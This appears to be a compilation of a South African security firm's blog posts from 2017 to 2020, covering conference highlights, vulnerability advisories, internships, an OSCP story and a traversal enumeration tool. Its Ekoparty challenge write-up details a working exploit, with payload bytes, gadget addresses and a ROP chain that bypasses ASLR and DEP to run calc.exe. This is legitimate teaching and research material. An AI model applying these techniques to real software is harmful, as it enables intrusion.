Channel: Telspace Africa, The Blog

2017 Highlights, a great year and even greater things to come!

As we enter a new year, Telspace would like to look back on 2017 and thank everyone who made it one of our greatest yet. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. 2017 also saw growth in the Telspace team, in particular in our Research and Development space (more to come!). This blog post provides an overview of some of the highlights of the year; if we have missed anything, let us know in the comments below! We kicked the year off by joining up with Carte Blanche to provide comment on mobile privacy and the tools used to spy on people.


Left to right: Stieler (Standard Bank), Bongani Bingwa (Carte Blanche), Simphiwe (PIC), Dino Covotsos (Telspace Systems)

Telspace has always been very close to the local infosec community and we believe in giving back. As part of this, Telspace got heavily involved in ITWeb’s first Hackathon where we provided our time to train, mentor and judge the participants. The inaugural Hackathon brought young professionals with an interest in developing their skills in Information Security together. The overall theme, “Innovation in Security”, challenged disruptive innovators to build the most secure systems possible, as well as to explore new innovative mechanisms for the industry.

The Hackathon was a great event and initiative, as it made the participants aware of the importance of information security. Telspace also took on board the participant from the Hackathon who demonstrated the most passion; as we always like to say, we can teach you skills but we can’t teach you passion!

Left to right: Manny Corregedor (COO of Telspace Systems), Nithen Naidoo (CEO of Snode) at the Hackathon Ideathon

For more information on the Hackathon go to:
In addition to supporting the ITWeb Hackathon, we also sponsored, provided training (ethical and wireless hacking) and spoke at the ITWeb Security Summit. We also got the opportunity to catch up with some old friends such as Jayson Street, an international speaker, who gave a keynote at the conference. We also made a donation to CANSA for every Telspace shirt that was given away to attendees who visited our stand.

Left to right: Eric Lundberg, Manny Corregedor and Jayson Street


Manny Corregedor giving a talk on ‘A false sense of information security’ at the ITWeb Security Summit.

The conference was well attended and had great international speakers such as Jayson Street and Mati Aharoni, who gave keynotes.

Telspace also attended the first local Johannesburg 0xCon conference, where our COO Manny Corregedor presented his talk “Breaking AVs for fun and the greater good”. A great day was had by everyone, and it was great seeing the community come together for this local conference.

Left to right (front): Manny, Mariska (No longer with Telspace), Sibusiso, Mark, Richard. Back: Eric.

Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.

In addition to supporting local events, we also attended Blackhat, Defcon 25 and Bsides in Las Vegas. Our analyst Richard Hocking gave a presentation on Hacking Stock Markets at BSides Las Vegas titled ‘(In)Outsider Trading - Hacking stocks using public information and influence.’

In Vegas many bonds were made and many beers were enjoyed. We look forward to attending again in 2018. We also donated to the fantastic Hackers for Charity, an amazing initiative which we fully support (Thanks Johnny!). More information on this great initiative can be found at: http://www.hackersforcharity.org/

Telspace also sponsored and presented at Bsides Cape Town 2017, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG). Our analyst Frank Allenby also presented his talk titled ‘Breach huffing; a culinary exploration of data breaches’.

Frank Allenby speaking at Bsides Cape Town

Our analyst Charlie Smith also won the capture the flag competition at BSides Cape Town; the prize was a Google Home device, sponsored by NClose Security.

Charlie Smith receiving his prize for winning the CTF at BSides Cape Town


Some “selfies for charity” at BSides Cape Town 2017

For a complete write up on our experience at BSides Cape Town visit:

http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html

This year we officially kicked off our security advisory service, Telspace Security Advisories (TSA), under which we responsibly disclosed a number of previously unknown vulnerabilities (0day) to vendors. In 2018 we plan to continue our research, not only finding unknown vulnerabilities but also releasing research that would be valuable to our clients and, more importantly, the community as a whole - stay tuned :) Lastly, we would like to thank everyone who made our 2017 so amazing: a huge thank you to our staff, clients, friends and most importantly the local Information Security community. We wish you all the best and a prosperous 2018.

Telspace Systems Security Advisory (TSA-2018-001)


Security Advisory



TSA-2018-001: Microsoft Access Information Disclosure Vulnerability

CVE Number: CVE-2018-0853


Summary

An information disclosure vulnerability exists when Microsoft Office Access software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.


Details and crash information

VCRUNTIME140!memcpy+0x4e:

72edd1ce f3a4            rep movs byte ptr es:[edi],byte ptr [esi]


Vendor: Microsoft

Product: Access

Version: 16.0.8625.2127

Vendor URLs:



Vendor Response

The vendor has patched the vulnerability and released a new version.


Disclosure Timeline

  • 23-11-2017 – Initial Discovery
  • 25-11-2017 – Vendor Notification
  • 19-01-2018 – Vendor Patch
  • 13-02-2018 – Public Disclosure


Credit

This vulnerability was discovered by Dmitri Kaslov of Telspace Systems

Telspace Systems Security Advisory (TSA-2018-002)


Security Advisory


TSA-2018-002: Microsoft Edge Information Disclosure Vulnerability

CVE Number: CVE-2018-0839

Summary

An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.


Details and crash information

edgehtml!Ordinal125+0xe3c86:

5ef196d6 8b5928          mov     ebx,dword ptr [ecx+28h] ds:0023:117cd008=????????


Vendor: Microsoft

Product: Edge

Version: 11.0.15063.67

Vendor URLs:


Vendor Response

The vendor has patched the vulnerability and released a new version.


Disclosure Timeline

  • 23-11-2017 – Initial Discovery
  • 29-11-2017 – ZDI Notification
  • 07-12-2017 – Vendor Notification
  • 21-02-2018 – Coordinated public release of advisory


Credit

This vulnerability was discovered by Dmitri Kaslov of Telspace Systems

Looking back on 2018 and forward to great things in 2019!


As we enter a new year, Telspace would like to look back on 2018 and thank everyone who made it a great and exciting year. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. This blog post provides an overview of some of the highlights of the year; if we have missed anything, let us know in the comments below!

We kicked the year off by hiring William Boshoff as our Chief Technical Officer (CTO); this was, and still is, part of our constant drive to continuously innovate and improve our services to clients. William believes that cultivating a culture of continual growth, learning and development directly translates into greater value for Telspace’s clients.

William’s experience ranges from assessing and consulting in high security environments, mostly in the finance and government sectors, through to lecturing and contributing as a subject matter expert on multiple boards.

In his spare time, William enjoys contributing to the information security community by sharing his research, mentoring and developing zero-day exploits.

William Boshoff (Telspace Systems CTO)

Telspace has also smashed international borders and expanded internationally to the UK, Egypt and Palestine! If you are interested and PASSIONATE, we are hiring!

Local is Lekker

Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this Telspace sponsored BSides Cape Town 2018, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG). 

Telspace Crew at BSides Cape Town 2018 (left to right): Manny Corregedor, Derek Scott, Ayaz Saiyed

Some “selfies for charity” at BSides Cape Town 2018

Telspace also spoke at ITWeb’s Security Summit 2018, gave training (Ethical Hacking 101) and exhibited. Our CEO, Dino Covotsos and COO, Manny Corregedor, were both part of the advisory board for 2018. The conference was well attended and had great international speakers such as Mikko Hyppönen, April Wright, Jayson Street and Rodrigo Branco who gave keynotes.

We also got the opportunity to catch up with the international speakers, who are old and good friends of Telspace Systems employees, and made a charitable donation to CANSA for every Telspace t-shirt that was given away to attendees who visited our stand. We also exhibited at the Department of Defence supplier day, which was well attended.

Left to right: Tarryn Hardman (Telspace Systems), Sibusiso Nxumalo (Former-Telspace Systems Employee), Rodrigo Branco (Intel), Manny Corregedor (Telspace Systems)

Left to right: Mikko Hyppönen (F-Secure), Dino Covotsos (Telspace Systems)
  
Manny Corregedor (Telspace Systems) giving a talk on ‘Information Security Cakes’ at the ITWeb Security Summit 2018


Telspace Systems Stand at the Department of Defence Supplier Day 2018

Going abroad!

Throughout the year we also participated in international conferences, round table events and provided comments on news stories in the media.
In addition to supporting local events, we also attended Blackhat, Defcon 26 and BSides in Las Vegas.
Our CEO Dino Covotsos also gave talks at:
  • Defcon 26 2018 – Recon Village (Las Vegas, USA)
  • Hack In The Box 2018 (Dubai)
  • Hackers to Hackers 2018, H2HC (Sao Paulo, Brazil)
Dino was also listed as one of the security researchers thanked by the Microsoft Security Response Center (MSRC) in recognition of making Microsoft online services safer by finding and reporting security vulnerabilities. More information at: https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive

Dino Covotsos giving a talk on Hacking the RFQ Process at Hackers to Hackers (Brazil)

SACICON 2018 Badges
Left to right: Lukas Hermann (Blue Frost Security GmbH), Dino Covotsos (Telspace Systems), Rodrigo Branco (Intel)
Dino Covotsos giving a talk on Hacking the RFQ Process at Defcon 26 2018 – Recon Village (Las Vegas, USA)
Left to right: Jayson Street, Nina Alli and Dino Covotsos at SACICON (Brazil)

Hack In The Box 2018 (Dubai)
Dino Covotsos giving a talk on Hacking the RFQ Process at Hack In The Box 2018 (Dubai)

Thank you!


We would like to thank everyone who made our 2018 so amazing: a huge thank you to our staff, clients, employees, friends and most importantly the local Information Security community. We wish you all the best and a prosperous 2019.

Telspace Systems Internship/Boot camp, March 2019


We are excited and proud to announce that our boot camp / internship kicked off yesterday!


After approximately 100 thorough interviews, which covered a number of areas, we have secured 10 new interns. The areas we covered during the interview stage, to name a few, were:

Networking, Linux, Windows, Software Development and Exploitation, Cryptography and general information security knowledge.

From a statistics perspective, the weakest area identified was cryptography (a future post on interview statistics is planned!).

We believe our internship / boot camp surpasses the industry “norm” due to the following reasons:


  • Our internships don’t have any monetary restraint attached to them and interns will be paid a monthly salary whilst they are undertaking the training with us, also, there are no restraints where the interns will have to pay back money if they don’t work for Telspace for a period of time. Doing anything else but this would only benefit the company itself, rather than the community. 
  • If interns don’t feel they are a match at Telspace Systems during the boot camp, they are free to go, taking with them the knowledge that we passed on to them as well as any certifications (and we are more than happy with that!).
  • Should our interns pass the assessment criteria at the end of the boot camp, via different assessment gateways (including a research gateway), they will be offered a full-time junior analyst position at Telspace Systems (which they don’t have to take!), with this offer there will be additional training / certifications provided.
  • This boot camp is about growing the community, and thereafter, our company in order to service our customers better in the future.  

We will be hosting a few more boot camps throughout the year, so keep your eyes peeled if you are interested in taking part in one!

Good luck to all our new interns, we hope to see many shells and calcs being popped!



Put Words In My Mouth


Put Words In My Mouth | Telspace Systems Intern Research
By Amy Manià


Money has been withdrawn from your account.

You don’t remember making, or authorising that transaction.

When you follow up with the bank, they say you called earlier and requested the transfer – it was, after all, you speaking, right? Unbeknownst to you, your voice was stolen, and so was your money.

As voice biometric authentication becomes more widespread, so too will the opportunities to spoof it. Text-to-Speech APIs are constantly improving; for example, Google’s technology is able to create voices that are indistinguishable from recordings of the real-life human speaker.

Threat actors have access to a target’s voice recordings through passive channels such as YouTube videos and social media posts. More active or invasive channels an attacker could use include compromising vulnerable IoT devices, which are becoming more commonplace throughout homes and offices. Social media posts and IoT devices allow threat actors to listen to a voice, capture it and then manipulate it (all using free online tools).

So what exactly can be done with a ‘stolen’ voice? This research explores the vulnerabilities in IoT devices, the legal landscape surrounding these devices and the various voice cloning, authentication and recognition software currently available. The report culminates by examining the possibilities of banking fraud, by using voice-spoofing to bypass authentication and transfer funds. The report includes a demonstration of the simulated attack on a bank.

Download the full Telspace Systems research paper here which was written by Amy: 
https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf

BSidesTLV - Proud Supporters




This year, Telspace Systems had a goal of giving back as much as we could to the information security community. This ranged from internships, research, free workshops, community based sponsorships and free training.

In line with this, we're very proud to announce that we'll be sponsoring BSides Tel Aviv 2019 (https://bsidestlv.com/), which will be hosted at Tel Aviv University, Israel.  We are very proud of the local community in Israel, and are happy to be supporting our friends and colleagues through our sponsorship of the conference as well as providing our Ethical Hacking 101 training course.

It also gives us great pride and joy to announce that we will be giving back 100% of the proceeds of our workshop to the local BSides TLV community, which is in line with our 2019 goals. We hope to see more companies doing this in order to grow the information security space worldwide and give back as much as possible to our amazing industry.

For more information about our training that we will be offering in Tel Aviv, click here:

https://bsidestlv.com/workshops/ethical-hacking-101/

Registration for BSides TLV can be completed at https://bsidestlv.com/register-2019/

We hope to see you there!

Giving back - Child Survivors of Crime (C.S.O.C)



Last month (May 2019) Telspace was once again a sponsor at the ITWeb Security Summit 2019, for more information on the ITWeb Security Summit refer to: http://v2.itweb.co.za/event/itweb/security-summit-2019/

In addition to sponsoring this local conference, Telspace proudly ran a charity initiative on the days of the summit whereby we gave out original Telspace branded t-shirts to delegates (with a twist). 

Every year we donate an amount to a charity for each t-shirt we give out, this year that amount was R40.00 per shirt. However, we also decided to try and give back more to the chosen charity and had a donation box at the stand. If a delegate wanted a t-shirt, a small donation (of any value) was requested in return for the t-shirt. Amazingly, thanks to the generous delegates at the summit, the donations box raised R3 296.10 over the 2 days. We thank you all for your generous contributions to this amazing initiative.


The chosen charity for this year was Child Survivors of Crime (C.S.O.C). This wonderful charity creates a rainbow after the storm for children affected by crime. Support is individually tailored to the specific needs of each child, because each one’s circumstances are unique. They offer this support via psychological, material, educational, peer and general assistance. Should you like more information on this charity and / or wish to assist in contributing in some way, please do not hesitate to view their website and get in touch by going to: http://childsurvivors.org.za/. This is in line with one of our Junior Analysts’ research topics for 2019 (Hi Delicia!).


In addition to the generous R3 296.10 raised, Telspace will be donating an additional R 8 000.00 (200 shirts x R40), making a total of R11 296.10 that will be donated to this amazing charity and initiative! We would like to say a huge thank you to all of the delegates that donated and participated in this initiative as well as our staff for getting involved! 


It should be noted that the t-shirts contain a hidden challenge, if you received a t-shirt, find the challenge, solve it and play along to see where it may take you! 


We would like to take this opportunity to once again say thank you to our staff, everyone that visited our stand and to everyone that showed support for Telspace Systems and in particular C.S.O.C. THANK YOU!

TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

Telspace Systems Security Advisory


TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

CVE number: CVE-2019-10709


Summary:


The AsusPTPFilter.sys driver on the Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the \\.\AsusTPdevice, leading to a DoS and could potentially lead to privilege escalation via a crafted DeviceIoControl call with a specific IOCTL code.


Vendor:


Asus


Product:


Asus Precision TouchPad


Version:


11.0.0.25



Proof of Concept:


Details and crash information:


Vendor response:


The vendor has patched the vulnerability and released a new version. 


Disclosure Timeline:

  • 25-03-2019 – Initial Discovery
  • 27-03-2019 – Vendor Notification
  • 29-08-2019 – Vendor Patch
  • 30-08-2019 – Public Disclosure


Credit:


This vulnerability was discovered by Athanasios Tserpelis of Telspace Systems

Solving the BFS Ekoparty 2019 Exploitation Challenge


This is a quick write-up about how one of our team members, Thanasis, solved the challenge for EkoParty 2019. This was a fun challenge, and thanks to Lukas and Nico from Blue Frost Security for making it happen (and for supporting our community).
More information about the challenge can be found at:
According to the requirements provided, the application needs to run on Windows 10 x64 (RS6), and the goal is to bypass ASLR and execute a calc.exe process.

By opening the application we can see via netstat that it binds on port 54321 on 0.0.0.0 (all the machine’s interfaces).

Opening the binary in Ghidra and going to the main function, it is obvious that some checks need to be bypassed in order to correctly send a payload to the application.

In Ghidra, if we check the function that is called after the new connection is accepted, we see this: 


The first check treats the first 0x10 bytes (16 chars) of the packet as a header.

The second and third checks: if the header starts with 0x393130326f6b45 (Ekoparty2019), then we are allowed to send a user_message, as long as it is smaller than 0x201 bytes (513 chars).

The fourth and last check is quite important: the whole packet structure must be 8-byte aligned, meaning we can send 16, 24, 32 bytes and so on.

After we succeed in sending a big buffer, it appears that the application crashes after 529 bytes or so. By sending 528 bytes structured correctly, with the cookie included at the beginning, we notice that before the call to the function sub_140001170 we actually control RAX, which holds the 513th byte.

Before this, there is the instruction

lea     rcx, unk_7FF6A8A9E520

and unk_7FF6A8A9E520 holds an array with this structure:


By sending the 513th character as, for example, A (\x41), we can make the function return our byte plus the rest of the pattern; in this case c3c3c3c3 + our byte + 488b01.

Before sub_140001170 returns this value it converts it to little endian, making it our byte + 488b01c3c3c3c3, so we get 41488b01c3c3c3c3.

This value is then used in WriteProcessMemory as lpBuffer, copying these bytes into the function sub_7FF6A8A91000 as instructions, which lets us control what is executed when we reach it.

Although this is quite useful, it limits the instructions we can use: only the 8-byte sequence byte + 488b01c3c3c3c3, of which only the first byte is ours.

I made a quick script in Python producing all the candidate values in a file:

# Enumerate every possible leading byte followed by the fixed 488b01c3c3c3c3 tail,
# one hex string per line (zero-padded so each line is a whole number of bytes).
start = "488b01c3c3c3c3"
for i in range(0x00, 0xff + 1):
    print("{:02x}{}".format(i, start))

With a bash one-liner I disassembled all the values (rasm2 is radare2’s assembler; -D disassembles the given hex string):

for i in $(cat list_instructions); do echo -e "\n$i" && rasm2 -b 64 -D "$i"; done > instructions


One good thing in this case is that we can actually control the RCX from our input buffer with the characters provided from 513 till 528.

The first thing I had to do was get the PEB address.

By sending these as the last bytes of our payload:

“\x65\x65\x65\x65\x65\x65\x65\x65\x60\x00\x00\x00\x00\x00\x00\x00”

we could acquire the PEB. \x65 is the byte that, combined with the fixed pattern, produces the instruction:

65488b01c3 

0:  65 48 8b 01             mov    rax,QWORD PTR gs:[rcx]
4:  c3                      ret


It is well known that on x64 Windows the GS segment register gives access to the PEB at a known offset. In this case, since we control RCX, we set it to 0x60, so gs:[rcx] reads the PEB pointer at offset 0x60.

Since the application always sends the leaked data back to us, we can read this address and use it.

The next step is to get the image base address of the application.

The image base address is located at PEB + 0x10, so we had to set RCX to the PEB address + 0x10 to leak it.

In this case, according to our possible instructions we chose:

0:  47 8b 01                mov    rax,QWORD PTR [rcx]
3:  c3                      ret

The first byte is 0x47 and, as before, these are the last bytes of our payload:

“\x47\x65\x65\x65\x65\x65\x65\x65” + address+0x10


As an end goal we need to create a ROP chain to execute calc.exe.

Since we want to bypass ASLR, the leak is already useful, but in order to execute something we also have to bypass DEP.

In this case it helps that the application has a WinExec call near its beginning.

Therefore, in the end we will launch calc.exe through WinExec. WinExec requires a pointer to the name of the application to execute, i.e. a pointer to the string calc.exe followed by a null terminator.

Somehow I had to find the place in memory holding my string. The best way was to get the StackBase Limit and walk towards the stack base to find where it is.

First, I had to leak StackBase Limit.

The StackBase Limit is in the TEB at offset 0x10, reachable through the GS register.

The initial request I used :

0:  65 48 8b 01             mov    rax,QWORD PTR gs:[rcx]
4:  c3                      ret

I controlled the RCX by setting it to 0x10.

After getting the leaked address of the StackBase Limit, it is time to loop towards the stack base to find the string calc.exe.

In this loop I leaked the stack cells one by one until my string was detected.

The moment the string was found, I saved the iteration count and multiplied it by 0x08 to get how many cells down the stack I had to go.

So now I had the address of the string.

In the above scenario I used:

0:  47 8b 01                mov    rax,QWORD PTR [rcx]
3:  c3                      ret

with RCX as the StackBase Limit, constantly adding 0x08 to it.

The next step is to get WinExec’s address on the stack. By checking the .rdata section of the application I could see its offset.


In this case, I need to leak the address from Image Base Address + 0x9010 offset.

By using exactly the same instructions as before:

0:  47 8b 01                mov    rax,QWORD PTR [rcx]
3:  c3                      ret

Then, setting RCX to Image Base Address + 0x9010, I get the leaked address for WinExec on the stack.

For the final request to the application I used 

0:  51                      push   rcx
1:  48 8b 01                mov    rax,QWORD PTR [rcx]
4:  c3                      ret


I set RCX to a pivot gadget, “add rsp,78h ; ret”, so I can stack pivot.

I used Ropper and rp++ to get gadgets out of the application.

Thankfully, the ret instruction gets us to a point in our buffer.

According to MSDN, WinExec requires 2 arguments: the name of the application and a number which sets the mode of the window.

On Windows 10 x64, the calling convention passes arguments in rcx, rdx, r8, r9 and then on the stack.

The structure of the packet is as follows. The whole packet is the cookie + 528 characters.

Structure:

|16 junk bytes| - padding

|pop_rax_gadget| - pop the Image Base Address to have a valid address in RAX, because the only available pop rdx and pop rcx gadgets also write through RAX (add byte ptr [rax], al).

|Image Base Address – 0x08| - valid address

|pop_rdx_gadget| - pop rdx gadget to put 0x01 in the WinExec second argument.

|0x01| - WinExec UINT uCmdShow

|pop_rax_gadget| - again, for the same reason: the pop rcx gadget also writes through RAX.

|pop_rcx_gadget| - set the pointer address that points to calc.exe\x00

|address_pointing_calc| - address that points to calc.exe\x00

|72 junk bytes| - padding

|ret_gadget| - just a return gadget to fix the stack alignment to 16 bytes, because CreateProcessA is called inside WinExec and contains a movaps instruction. movaps requires an aligned stack and raises an exception if it is not.

|winexec_leaked_address| - winexec address on the stack.

|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.

|120 junk bytes| - padding.

|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.

|120 junk bytes| - padding.

|add_rsp_0x28| - adds to current RSP + 0x28 bytes to reach the next stack pivot.

|40 junk bytes| - padding.

|add_rsp_0x58| - adds to current RSP + 0x58 bytes to reach the original return pointer address and continue the execution of the application instead of crashing it.

|8 junk bytes| - padding.

|calc.exe\x00| - string to set in memory.

|15 junk bytes| - padding.



Gadgets Used:

0x14000158b: add rsp, 0x78 ; ret ;
0x0000000140004525: pop rdx; add byte ptr [rax], al; cmp word ptr [rax], cx; je 0x4530; xor eax, eax; ret;
0x140001167: pop rax ; ret ;
0x00000001400089ab: pop rcx; or byte ptr [rax], al; add byte ptr [rax - 0x77], cl; add eax, 0x4b12; add rsp, 0x48; ret;
0x0000000140001164: add rsp, 0x58; ret;
0x14000158f: ret ;
0x00000001400011d5: add rsp, 0x28; ret;


The full working exploit can be downloaded here from our Github:

Mandatory calc.exe POC screenshot:


Travesty – A directory and file enumeration tool (post directory traversal exploitation)


About a year and a half ago, our team was working on an assessment where we had root access to a server via a directory traversal, but we couldn’t convert that into a working shell because of several restrictions on the server and a very strong password policy, i.e. the /etc/shadow passwords could not be cracked within the assessment timeframe. We still knew that we had access to a very valuable target though.

It became quite difficult for us to progress on the assessment as we couldn’t see which files and directories on the server might be unique. Taking this into account, Dino and Manny came up with the simple idea of downloading the mlocate database (since, luckily, we had the required privileges). The mlocate database is quite a mess if you open it directly in a text editor, but we were lucky enough to find pymlocate (https://github.com/salexan2001/pymlocate), which gave us a neatly formatted file of the directory structure on the target machine. Thanks to Alexander Schlemmer (salexan2001) for creating it.


We then created our own tool, called Travesty, which allowed us to automate the entire process, requiring just the vulnerable traversal URL and an output filename.


Utilising the tool has proved to be extremely useful over the course of this year on various assessments and it’s a great way to quickly find valuable information, files and directories on a target, that you wouldn’t normally know of on the machine.


We’ve decided to release the small script to the public, in order to assist analysts in their day to day jobs – if it even helps one security analyst, we’re happy!


We’ve released the tool on our Github at:

https://github.com/telspacesystems/travesty/

There’s a lot of work to be done and things that we want to add to it, but for now it does the job (just!).

Usage:





In action screenshot:
Output formatting:



Happy Hacking!

Boot Camp: 2020

Telspace has kicked off 2020 with a fresh intake of interns into our Boot Camp program. After approximately 100 grueling interviews, eight candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the program, having submitted research proposals, completed assignments and braved their way through two simulated (CTF style) assessments!


 
We asked them for some feedback on their experience so far:

It's grueling, and I honestly don't know where my socks are when I wake up in the mornings anymore, but I'm loving every second of it - Rico

I think a bootcamp is a life changing experience, it's like a pressure cooker but in a good way. So here I am to get my hack on - Lorthar

I’m hooked on hacking, I love the community and culture in this industry. I’m grateful to be where I am now and very excited about my future, although I would definitely and obviously prefer Telspace above any other option as everything about it just fits perfectly - like it’s too good to be true! - Arno

Loving the Bootcamp so far, it's like my second home – Thaba

I am super grateful to be at Telspace because Information Security is my passion - Edison

Being part of the internship is interesting because I get to improve on the knowledge I have while I could test my technical capabilities by exploiting system vulnerabilities - Thabiso

Cyber security plays an important part in our day to day life – Mothusi


 
For those interested in entering the industry, we will be hosting more boot camps in the future. If you would like to partake please get in touch with us! 

To help you prepare: the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:


• Our interns have no monetary restraints attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there is no requirement for interns to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Any other approach would benefit neither our newcomers to the industry nor the community at large.


• If interns are uncertain that they are a good fit for the industry or at Telspace Systems during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).


• Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways (including a research component and simulated penetration tests in various environments), then they will be offered a 6 month contract as a junior analyst with Telspace Systems (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.


• This boot camp is about growing the information security community and, thereafter, our company, in order to provide our customers with the best possible service.



Telspace wishes each new intern the very best of luck; we are eager to see the wonderful research you complete as well as the many shells you will be popping!

From Intern to OSCP Certified


I received a delivery from DHL on Friday, and there was a distinct lump in my throat when I opened the package which contained that pristine white cardboard folder, holding MY OSCP certificate. I had dreamed of seeing my name on those silver letters - and now I did.

I posted a photograph of the certificate on my LinkedIn and received an overwhelming response. So many people were curious about how they too could complete the PWK course, or they wanted advice - or to know how I transitioned from being an Architect (the construction kind) to a Pentester.

There are many blogs about the OSCP, which provide tips and advice on the best way to tackle the course and approach the exam. I read many of them, and found them helpful - and I encourage anyone reading this to do the same. 

I also want to state at the very beginning of this blog that I certainly do not claim to be an expert in any way whatsoever. I am continuously humbled by how much there is to learn, the people I have the privilege to work with, as well as the colleagues in this industry at large.

Everyone has their own story to tell, this is mine.


PRE-INTERNSHIP


I discovered Security somewhat by chance from someone who has a deep passion for their career as a penetration tester, and would speak about it constantly. Their level of enthusiasm was undeniable and I found it contagious - my curiosity had been piqued and I couldn't help myself - I wanted to know more... and that's the thing, it's at that exact moment where it happens:

Security needs to grab a hold of you, and you have no urge to escape it...

(NOTE: This may seem like an obvious thing to say, but is an important part of the process, because if this is not your passion - you're going to have a very bad time.)

I had no background in IT whatsoever, and needed to start learning some basics. Like many others who find themselves interested in 'InfoSec', I started on the journey to find out more.

This process seems to have two main parts. On the one hand, I was pleasantly surprised to discover that many good-quality resources exist - mostly for free. Coming from a university background, I found it incredible that so many people had so freely given their knowledge away for others to learn. On the other hand, there was just SO much to learn - where on earth do you start?

My advice is: just start. Somewhere. Anywhere.

If you are like me, previously with very limited knowledge, everything will seem disjointed at first and you will feel like you're learning many different concepts in isolation... but KEEP AT IT! Eventually, slowly but surely - all of these little things will start to link up and become clearer as part of 'the bigger picture', and the satisfaction of those 'ah-ha' moments is unparalleled.

PRE-INTERNSHIP TLDR:

  • Start with learning the basics: Cybrary is a good place to start as well as Over The Wire war games.
  • Keep at it!

INTERNSHIP PART 1


Just like there is no 'right' way to start learning about security, there is no correct way to get started in the industry. Get onto Twitter, and tap into the massive community that is active there, find out about the Pentesting Companies in your country, local industry events, then network, talk to people and get involved.

After I had spent a few months doing self-study, I emailed Telspace Systems to introduce myself and ask for advice about how to get started in the industry. The response I received from Manuel Corregedor informed me about an upcoming Internship program and asked if I would like to participate in an interview. Thankfully, the little bit of technical knowledge I had managed to gain (while running a full-time business of my own) meant I met the criteria, and was offered a position at the Boot Camp which started on 4 March 2019. As they say - the rest is history (with a lot of blood, sweat and tears involved)!

I am aware that a lot of people experience considerable barriers to entry. If this is the case - please do not give up. Please keep trying to find the place that fits you... and when you do find that place and start to make progress, please keep 'paying it forward'. This is a huge part of the Telspace Systems "mantra". As far as I am concerned - opening doors for others and giving back is a big part of the process. Security would not be the awesome industry that it is, if everyone kept their magic to themselves.

INTERNSHIP 1 TLDR:

  • Get involved with the community, until you can get your foot in the door.
  • Keep at it!

INTERNSHIP PART 2


The internship at Telspace Systems is simultaneously gruelling, and immense fun. The Boot Camp is designed to be high-pace, and really test potential analysts in a variety of ways.

I have been immensely lucky to receive training from world-class pen-testers, who I have the utmost respect for. The knowledge that is shared during an internship is priceless, and can vastly accelerate your learning experience.

It is however worth keeping in mind that (during an internship) all candidates are given the same information to learn, and opportunities for growth - but the rest is up to you! You have to spend time doing self study, because there is not a single pentester on earth who can hand-hold an intern/beginner the whole way through the process... and it would not make sense to either - learning HOW to google, and deal with unfamiliar situations is part of this job!

INTERNSHIP 2 TLDR:

  • Learn as much as you can, and make the most of your opportunities.
  • Keep at it!

Junior Analyst/OSCP


The interns who successfully complete a Telspace Systems Boot Camp are offered a 6 month contract position, and are required to start the Offensive Security Penetration Testing with Kali course immediately.

During these 6 months, the Juniors get to shadow analysts on assessments, complete their studies, conduct research, attend events and learn more about the industry. At the end of the 6 month period, every Junior Analyst needs to demonstrate excellence in multiple aspects in order to receive a permanent position here at Telspace Systems.

This requires a lot of hard work and dedication - and comes back to what I said in the very beginning about passion for this as a career, not a nine-to-five 'job'. Your attitude has to be the former to make tangible progress.

As far as actual OSCP preparation goes, this is my advice in a nutshell:
  • Read through the PDF manual. OffSec are trying to teach you certain principles contained in that document - so do not toss it aside. 
  • Manage your time carefully, because you get to keep the PDF, but your lab-time is ticking.
  • Choose the longest lab-time package possible (or whichever you feel is suitable, depending on your skill level).
  • Spend as much time practicing in the labs as you can. 
  • Exploit manually, rather than relying on Metasploit. You will thank me when it comes to exam time and to your actual assessments in real life!
  • If your lab time runs out, consider extending it or signing up for a paid subscription like Hack the Box.
  • Have you Googled it? 
  • Keep at it, if that isn't working then you need to Try Harder!
Passing the PWK exam to become OSCP certified is no easy task. There is a lot to learn, and the actual exam is 24 hours long, with a further 24 hours provided as reporting time. (NOTE: The PWK was updated last week, and the course structure has changed. There may be changes to the exam too that I am not aware of).

This is arduous, just because of the sheer length of the exam. So I recommend that you write this in a space where you feel comfortable, where you know you will have uninterrupted access to electricity and Wi-Fi (a real problem in South Africa unfortunately), have plenty of snacks, and finally - my mentor Dino Covotsos gave the great advice to take breaks and rest.

It can be easy to get fixated on a rabbit hole, and lose hours of time trying to get one thing to work. You will be amazed at the other possibilities that pop into your head during a short walk or nap!

Failing


This is a hard one to talk about, but something worth consideration BEFORE your first attempt.

There are people who do pass on their first attempt - I was not one of those people. If, like me, you fail an attempt at the OSCP (or any exam for that matter), being able to identify your weaknesses so that you can improve upon them means that you are still able to gain something from the experience.

However, failing was not something I was used to. It can be very discouraging and make you feel like you're not capable, smart enough, or meant for this industry; and it is admittedly difficult to keep those mind-monsters in check sometimes. Thankfully, some of the most talented people in the industry have openly admitted to feeling like they are failures, suffer from imposter syndrome and often feel demotivated.

